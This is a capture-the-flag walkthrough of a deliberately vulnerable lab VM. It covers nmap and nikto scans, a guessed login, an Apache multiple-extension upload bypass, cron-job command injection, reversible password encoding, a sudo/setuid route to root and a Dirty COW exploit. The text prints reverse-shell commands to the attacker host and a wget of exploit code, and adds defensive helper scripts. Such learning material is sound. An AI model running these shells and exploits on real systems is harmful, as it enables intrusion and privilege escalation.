# Lab setup

The download is an OVA. Import it into your hypervisor (VirtualBox here); the import throws one error partway through, just click Retry and it completes.

After importing, add a network adapter in NAT mode and set that adapter's MAC address to 08:00:27:A5:A6:76 (Settings > Network > Advanced). The box only comes up on the network with that MAC, so do not skip this step.

Environment setup reference: https://blog.csdn.net/weixin_45744814/article/details/120168008

IP address: 192.168.74.138

# Information gathering

# nmap

Start with a quick full-port scan:

```
┌──(root㉿kali)-[~]
└─# nmap -p- -T5 192.168.74.138
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 04:08 EDT
Nmap scan report for bogon (192.168.74.138)
Host is up (0.00045s latency).
Not shown: 65479 filtered tcp ports (no-response), 55 filtered tcp ports (host-prohibited)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 71.77 seconds
```

Only port 80 is open, which makes this interesting: it is almost certainly a web exploitation box.

# dirsearch

```
┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.74.138
  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/_192.168.74.138/_24-04-08_04-10-32.txt
Target: http://192.168.74.138/
[04:10:38] Starting:
[04:10:41] 403 -  213B  - /.ht_wsr.txt
[04:10:41] 403 -  216B  - /.htaccess.bak1
[04:10:41] 403 -  218B  - /.htaccess.sample
[04:10:41] 403 -  216B  - /.htaccess.save
[04:10:41] 403 -  217B  - /.htaccess_extra
[04:10:41] 403 -  216B  - /.htaccess_orig
[04:10:41] 403 -  216B  - /.htaccess.orig
[04:10:41] 403 -  214B  - /.htaccess_sc
[04:10:41] 403 -  214B  - /.htaccessOLD
[04:10:41] 403 -  207B  - /.html
[04:10:41] 403 -  206B  - /.htm
[04:10:41] 403 -  214B  - /.htaccessBAK
[04:10:41] 403 -  215B  - /.htaccessOLD2
[04:10:41] 403 -  216B  - /.htpasswd_test
[04:10:41] 403 -  212B  - /.htpasswds
[04:10:41] 403 -  213B  - /.httr-oauth
[04:11:04] 403 -  210B  - /cgi-bin/
[04:11:13] 403 -  208B  - /error/
[04:11:19] 301 -  237B  - /images  ->  http://192.168.74.138/images/
[04:11:19] 200 -    1KB - /images/
[04:11:40] 200 -   62B  - /robots.txt

Task Completed
```

dirsearch does not turn up much of value: a listable /images/ directory and a robots.txt, plus the usual 403s on .htaccess variants.

# nikto

```
┌──(root㉿kali)-[~]
└─# nikto -h 192.168.74.138
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.74.138
+ Target Hostname:    192.168.74.138
+ Target Port:        80
+ Start Time:         2024-04-08 04:10:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ /: Server may leak inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 13:45:47 2015. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: Entry '/cola/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/sisi/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/beer/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 3 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.0.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.3.3 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ PHP/5.3 - PHP 3/4/5 and 7.0 are End of Life products without support.
+ /icons/: Directory indexing found.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8911 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2024-04-08 04:11:32 (GMT-4) (34 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```

nikto points us at robots.txt, whose three entries (/cola/, /sisi/, /beer/) deserve a manual look. It also fingerprints the stack as Apache/2.2.15 with PHP/5.3.3 on CentOS, which becomes relevant at the file upload stage.

# Imagination

All three directories serve nothing but an image. Steganography? That would make no sense here.

A glance at someone else's writeup shows the intent: we are meant to guess the path ourselves. The only hints are the text THIS IS NOT THE URL on those images and the logo image on the home page.

Fine, that counts as information gathering too, abstract as it is.

Guessing gets us http://192.168.74.138/fristi/. For someone as short on imagination as me this is painful. I considered a crawler, but the site is too sparse for one to find anything, so the alternative is enumeration. But why would enumeration be the expected route? There is no logic to it.

# Image

Opening that path reveals a login form, which was confusing.

Two things to try now: SQL injection and more information gathering. This box feels like it runs on jokes, so I looked at the page source (F12) first. There is a commented-out Base64 blob; decoding it yields an image whose text reads: keKkeKKeKKeKkEkkEk. Its purpose was unclear and it reads like a taunt; used as a path, and as a password without a matching username, it got nowhere.
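The manual step above (spot a Base64 blob in an HTML comment, decode it, notice it is an image) is worth automating, because the same trick shows up on many boxes and real pages. The script below is an added example, not code from the original walkthrough: it pulls every Base64 run out of HTML comments, decodes the ones that decode cleanly, and identifies the result by magic bytes. The sample page and the 1x1 PNG in it are constructed test data, not the target's real page or image.

```python
# Added example, not code from the original walkthrough: pull Base64 blobs out of
# HTML comments and identify what they decode to by magic bytes. The HTML and the
# 1x1 PNG below are constructed test data, not the target's real page or image.
import base64
import binascii
import os
import re

# Magic bytes for the file types a blob hidden in a web page usually turns out to be.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"PK\x03\x04": "zip",
    b"%PDF": "pdf",
}

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.S)
# A Base64 run: at least 16 alphabet characters, optional '=' padding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def sniff(data: bytes) -> str:
    """Name the file type from its leading bytes, or 'unknown'."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return "unknown"


def extract_blobs(html: str):
    """Return [(comment_index, file_type, decoded_bytes)] for every Base64 run
    inside an HTML comment that decodes cleanly. Line-wrapped blobs are joined
    first, since that is how such data is usually pasted into a page."""
    found = []
    for idx, m in enumerate(COMMENT_RE.finditer(html)):
        body = "".join(m.group(1).split())      # drop newlines and indentation
        for token in B64_RE.findall(body):
            try:
                raw = base64.b64decode(token, validate=True)
            except (binascii.Error, ValueError):
                continue                         # prose that merely looks like Base64
            found.append((idx, sniff(raw), raw))
    return found


def save_known_blobs(html: str, outdir: str):
    """Write every blob with a recognised type to outdir; return the paths written."""
    os.makedirs(outdir, exist_ok=True)
    paths = []
    for idx, kind, raw in extract_blobs(html):
        if kind == "unknown":
            continue
        path = os.path.join(outdir, f"comment{idx}.{kind}")
        with open(path, "wb") as fh:
            fh.write(raw)
        paths.append(path)
    return paths


# Constructed sample page: a note comment (like the eezeepz TODO) plus a wrapped
# Base64 PNG. The PNG is a generic 1x1 placeholder, not the image from the box.
SAMPLE_HTML = """<html><body>
<!-- TODO: clean this up for production, left some junk here for testing -->
<form method="post"><input name="user"><input name="pass" type="password"></form>
<!--
iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAA
AABJRU5ErkJggg==
-->
</body></html>"""

if __name__ == "__main__":
    for idx, kind, raw in extract_blobs(SAMPLE_HTML):
        print(f"comment #{idx}: {kind}, {len(raw)} bytes")
```

Prose inside a comment can also match the Base64 alphabet (the TODO line above produces one such hit), which is why the decoder keeps those as `unknown` rather than dropping them: on a real page you want to eyeball them, since a plain-text credential would also sit there. Point `save_known_blobs` at the fetched page to get the image on disk for viewing.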

Running dirsearch against the new path turns up an uploads directory. It cannot be browsed directly (403), but its existence says there is a file upload somewhere behind the login.

Stuck, I went back through the raw HTML source and found a second comment I had missed:

```html
<!-- 
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
-->
```

That gives us a name, eezeepz. Combined with the string from the image, the login works straight away:

Credentials: eezeepz / keKkeKKeKKeKkEkkEk

# Exploitation

# File upload

Logged in, the page is indeed a file upload form.

Uploading a plain .php file is rejected: the extension is validated on the server. So we need an upload bypass built from what we already gathered, starting with Apache 2.2.15.

The relevant behaviour is Apache's handling of multiple extensions. On CentOS, mod_php is registered with AddHandler, and mod_mime applies a handler when any of a filename's dot-separated extensions maps to it, not only the last one. The upload form here uses a suffix whitelist and does not rename files, so uploading a one-line web shell as 1.php.jpg passes the check (the name ends in .jpg) and is still executed as PHP. Connecting to it with AntSword gives a low-privilege shell as the apache user.

I need to go back over Apache's parsing quirks and build the exploitation path properly; I had forgotten the details.
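To make the bypass concrete, here is an added example (not the target's upload.php or its httpd.conf, neither of which is shown on this page) that models the two halves of the bug: a whitelist that only looks at the last extension, and mod_mime assigning the PHP handler because some extension is .php. It assumes the form whitelists png/jpg/gif by the final suffix and keeps the client's filename, and that Apache registers PHP with `AddHandler php5-script .php` as the CentOS 6 php.conf does. The hardened check beside it refuses anything but `<name>.<ext>` and picks a random server-side name.

```python
# Added example, not the target's upload.php or httpd.conf: why a last-extension
# whitelist plus mod_php's AddHandler lets 1.php.jpg run as PHP, next to a check
# that does not. Assumptions: whitelist png/jpg/gif by final suffix, filename kept;
# Apache configured with "AddHandler php5-script .php".
import os
import secrets

ALLOWED = {"png", "jpg", "gif"}
HANDLERS = {"php": "php5-script"}          # AddHandler php5-script .php


def upload_check_naive(filename: str) -> bool:
    """The weak check: look only at the text after the last dot."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED


def apache_handler(filename: str):
    """Handler mod_mime assigns to a file. Every dot-separated extension is
    examined; one that maps to a handler sets it, and a later extension such as
    .jpg only contributes a MIME type, it does not clear the handler."""
    handler = None
    for ext in os.path.basename(filename).split(".")[1:]:
        handler = HANDLERS.get(ext.lower(), handler)
    return handler                      # None: served as a static file


def upload_check_hardened(filename: str):
    """Accept only <name>.<ext> with a whitelisted ext, and return a server-chosen
    random name so the client never controls what lands on disk."""
    parts = os.path.basename(filename).split(".")
    if len(parts) != 2 or not parts[0] or parts[1].lower() not in ALLOWED:
        return None
    return f"{secrets.token_hex(8)}.{parts[1].lower()}"


if __name__ == "__main__":
    for name in ("photo.jpg", "1.php.jpg", "1.jpg.php", "shell.php"):
        print(f"{name:12} naive={upload_check_naive(name)!s:5} "
              f"handler={apache_handler(name)} hardened={upload_check_hardened(name)}")
```

The matching fix on the Apache side is to bind the handler with `SetHandler` inside a `<FilesMatch "\.php$">` block, so only names that end in .php execute, and to turn the PHP engine off for the uploads directory; the filename check alone is not enough, because the naming scheme and the server configuration have to agree.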

# Privilege escalation

With a shell as apache, the next step is privilege escalation.

# Escalating via the hint and sudo

Listing the users on the box shows three accounts.

Of these, eezeepz's home directory is readable, and it contains a notes.txt with a hint.

Contents (paraphrased): Jerry has set up some automated checks for you, but only allows you access to the /usr/bin/* system binaries. He has also copied some commonly used commands into his home directory: chmod, df, cat, echo, ps, grep, egrep, which you can use from /home/admin/. To run them, create a file in /tmp/ called "runthis", one command per line. The output is stored in /tmp/ in a file called "cronresult". The commands run every minute under Jerry's account.

So whatever we write to /tmp/runthis gets executed every minute with the privileges of Jerry's account, admin.

Do I actually need the cron job, though?

I tried working from the apache account first, for instance checking for sudo rights, but sudo -l refuses to run without a tty (the sudoers Defaults include requiretty, as the later sudo -l output shows). A bash TCP reverse shell, bash -i >& /dev/tcp/192.168.74.129/1234 0>&1, followed by python -c 'import pty;pty.spawn("/bin/bash")' gives a usable tty, but sudo -l then asks for apache's password, which we do not have.

Short of a kernel exploit, the apache account looks like a dead end.

Back to the cron job and the admin account.

I first tried to get a shell from the cron job with echo "/usr/bin/../../bin/bash -i > /dev/tcp/192.168.74.129/4455 0<& 2>&1" > /tmp/runthis, but the nc listener received the connection and died immediately. At the time I blamed the missing tty; the real problem is the redirections. That line only sends stdout to the socket, stdin is never attached to it (0<& is missing a descriptor), so the interactive bash hits EOF on input and exits, closing the connection. The working form is the same one used for the apache shell above, ... >& /dev/tcp/HOST/PORT 0>&1, which ties stdin, stdout and stderr to the socket. The /usr/bin/../../bin/ prefix is needed because the cron script only accepts commands whose path starts with /usr/bin or /home/admin, and it checks that as a string rather than normalising the path.

In the end I simply made admin's home directory accessible to everyone: echo '/usr/bin/../../bin/chmod -R 777 /home/admin' > /tmp/runthis
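The allow-list described in notes.txt is the actual weakness here, so it is worth modelling. The script below is an added example, not the box's cron script (whose source is not on this page): `allowed_naive` is the string-prefix check that the /usr/bin/../../bin/ trick implies, and `plan_hardened` is what a safe version looks like, normalising the program path and allow-listing specific programs rather than whole directories. The hardened list of programs (the copies in /home/admin plus two read-only /usr/bin tools) is an assumption for the example.

```python
# Added example, not the box's cron script: the notes.txt allow-list modelled as a
# string-prefix check (defeated by /usr/bin/../../bin/), beside a version that
# normalises the path and allow-lists specific programs. ALLOWED_PROGS is assumed.
import posixpath
import shlex

ALLOWED_DIRS = ("/usr/bin", "/home/admin")
ALLOWED_PROGS = {f"/home/admin/{p}" for p in
                 ("chmod", "df", "cat", "echo", "ps", "grep", "egrep")}
ALLOWED_PROGS |= {"/usr/bin/id", "/usr/bin/uptime"}   # assumed read-only extras


def allowed_naive(line: str) -> bool:
    """Prefix check on the raw text; '/usr/bin/../../bin/bash ...' passes."""
    return line.startswith(ALLOWED_DIRS)


def plan_hardened(line: str):
    """Return the argv to execute (without a shell) or None if the line is refused.
    posixpath.normpath collapses '..' segments; realpath would also resolve
    symlinks, which matters once the binary lives on a real filesystem."""
    try:
        argv = shlex.split(line)
    except ValueError:
        return None                      # unbalanced quotes
    if not argv or not posixpath.isabs(argv[0]):
        return None
    prog = posixpath.normpath(argv[0])
    if prog not in ALLOWED_PROGS:
        return None                      # whole-directory grants include interpreters
    return [prog] + argv[1:]


if __name__ == "__main__":
    for line in ("/usr/bin/../../bin/chmod -R 777 /home/admin",
                 "/home/admin/df -h",
                 "/usr/bin/python -c 'import os; os.system(\"/bin/sh\")'"):
        print(f"{line!r}: naive={allowed_naive(line)} hardened={plan_hardened(line)}")
```

Two design points. The returned argv is meant to be run with subprocess.run(argv) and no shell, so `>`, `;` and `$(...)` in the line are inert arguments instead of redirections and command separators. And allow-listing by directory is weak even with path normalisation, because /usr/bin contains interpreters (python, perl) that execute arbitrary code as the cron user; the example therefore lists programs, not directories.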

A minute later /home/admin is readable, and it holds some sensitive files:

```
bash-4.1$ cat /home/admin/whoisyourgodnow.txt
cat /home/admin/whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
bash-4.1$ cat /home/admin/cryptedpass.txt
cat /home/admin/cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
bash-4.1$ cat /home/admin/cryptpass.py 
cat /home/admin/cryptpass.py
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys
def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
```

cryptpass.py is base64, then reverse, then rot13, with no key anywhere, so anyone who can read the script can invert it. Write the inverse and run it on both values:

```python
#decoderot13.py - inverse of cryptpass.py: undo rot13, reverse, then base64-decode
import base64, codecs, sys

def decodeString(s):
    base64string = codecs.decode(s, 'rot13')       # rot13 is its own inverse
    return base64.b64decode(base64string[::-1])    # reverse, then base64-decode

cryptoResult = decodeString(sys.argv[1])
print(cryptoResult.decode())                       # bytes -> str on Python 3
```

That gives two passwords: whoisyourgodnow.txt decodes to LetThereBeFristi! (fristigod's password) and cryptedpass.txt to thisisalsopw123 (admin's).

Log in as fristigod:

```
[admin@localhost uploads]$ su fristigod
su fristigod
Password: LetThereBeFristi!
bash-4.1$ whoami
whoami
fristigod
```

I had already checked admin, who has no sudo rights; fristigod does:

```
bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!
Matching Defaults entries for fristigod on this host:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
    (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
```

fristigod may run /var/fristigod/.secret_admin_stuff/doCom as the user fristi via sudo. doCom is a setuid-root binary that executes whatever command it is given, so handing it /bin/bash spawns a root shell, and that is the end of the box:

```
bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
bash-4.1# whoami
whoami
root
```

# Dirty COW privilege escalation

An alternative route from the low-privilege shell: search for Dirty COW exploit code.

```
┌──(root㉿kali)-[~]
└─# searchsploit dirty
---------------------------------------------------------------------------------------------------------- --------------------------------
 Exploit Title                                                                                            |  Path
---------------------------------------------------------------------------------------------------------- --------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)                                    | linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)                                    | linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method) | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)    | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method)              | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)               | linux/local/40611.c
Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)                                       | linux/local/50808.c
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL                           | android/dos/46941.txt
Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion                                 | php/webapps/4603.txt
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion                                  | php/webapps/3729.txt
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)                                       | linux/local/46361.py
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)                                       | linux/local/46362.py
---------------------------------------------------------------------------------------------------------- --------------------------------
Shellcodes: No Results
---------------------------------------------------------------------------------------------------------- --------------------------------
 Paper Title                                                                                              |  Path
---------------------------------------------------------------------------------------------------------- --------------------------------
DirtyTooth: Extracting VCARD data from Bluetooth iOS profiles                                             | docs/english/42430-dirtytooth-ex
---------------------------------------------------------------------------------------------------------- --------------------------------
```

Any of the Dirty COW entries whose kernel range covers the target would do (check uname -r on the box before picking one). I used 40839.c, the /etc/passwd method, which writes a new uid 0 user into /etc/passwd rather than patching a SUID binary.

Serve the exploit from the attacker machine, fetch and compile it on the target, then run it to add the root user firefart:

```
┌──(root㉿kali)-[~]
└─# service apache2 start
┌──(root㉿kali)-[~]
└─# cp 40839.c /var/www/html
bash-4.1$ wget http://192.168.74.129/40839.c -O 40839.c
wget http://192.168.74.129/40839.c -O 40839.c
bash-4.1$ gcc -pthread 40839.c -o dirty -lcrypt
gcc -pthread 40839.c -o dirty -lcrypt
bash-4.1$ ./dirty 123456
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 123456
Complete line:
firefart:fi8RL.Us0cfSs:0:0:pwned:/root:/bin/bash
mmap: 7fa407cb0000
┌──(root㉿kali)-[~]
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.74.129] from (UNKNOWN) [192.168.74.138] 37326
bash: no job control in this shell
bash-4.1$ su firefart
su firefart
standard in must be a tty
bash-4.1$ python -c 'import pty;pty.spawn("/bin/bash");'
python -c 'import pty;pty.spawn("/bin/bash");'
bash-4.1$ su firefart
su firefart
Password: 123456
[firefart@localhost uploads]#
```

That is root. Note that su needs a tty, hence the pty.spawn before the second attempt, and that the exploit backed up the original /etc/passwd to /tmp/passwd.bak: restore it when you are done, since the modified file is what every later login on the box will read.

Note that the compile flags are required!

This command uses the gcc compiler to build the source file 40839.c into an executable named dirty. Piece by piece:

  • gcc : the GNU Compiler Collection, the usual C compiler on Linux.
  • -pthread : links the POSIX threads library; the exploit races two threads against the kernel, so it needs this.
  • 40839.c : the source file; .c is the conventional extension for C sources.
  • -o dirty : names the output executable dirty.
  • -lcrypt : links libcrypt, which provides the crypt() function the exploit uses to hash the new password for the /etc/passwd entry.

Taken together, the command compiles 40839.c into dirty, with the thread and crypt libraries linked in so the exploit can run its race and generate the password hash.

# Summary

  • rot13 (an encoding, not encryption: there is no key, so anyone who can read the script can reverse it)
  • finding the useful information (robots.txt, HTML comments, a note left in a home directory)
  • Dirty COW privilege escalation
  • Apache multiple-extension handling for the upload bypass

I urgently need to go back over Apache's historical weaknesses and how they chain with other flaws.